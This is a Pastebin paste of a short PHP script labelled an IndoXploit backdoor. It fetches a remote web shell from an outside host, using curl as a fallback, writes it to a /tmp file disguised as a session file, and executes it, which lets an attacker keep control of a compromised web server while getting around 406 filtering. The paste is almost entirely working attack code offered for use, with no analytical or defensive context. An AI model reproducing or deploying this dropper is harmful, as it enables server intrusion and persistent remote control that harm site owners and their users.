Advertisement
Ribang

TMP SHELL [Bypass 406 & Auto Delete Shell]

Dec 14th, 2017
570
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.77 KB | None | 0 0
  1. <?php
  2. # IndoXploit Backdoor
  3. # Bypass 406 Not Acceptable & Auto Delete Shell
  4. # Coded by: L0c4lh34rtz - IndoXploit
  5.  
  6. $URL = 'http://server.indoxploit.or.id/indoxploit_v3.txt';  # Backdoor URL
  7. $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
  8.  
  9. function M() {
  10.     $FGT = @file_get_contents($GLOBALS['URL']);
  11.     if(!$FGT) {
  12.         echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`;
  13.     } else {
  14.         $HANDLE = fopen($GLOBALS['TMP'], 'w');
  15.         fwrite($HANDLE, $FGT);
  16.         fclose($HANDLE);
  17.     }
  18.     echo '<script>window.location="?indoxploit";</script>';
  19. }
  20.  
  21. if(file_exists($TMP)) {
  22.     if(filesize($TMP) === 0) {
  23.         unlink($TMP);
  24.         M();
  25.     } else {
  26.         include($TMP);
  27.     }
  28. } else {
  29.     M();
  30. }
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement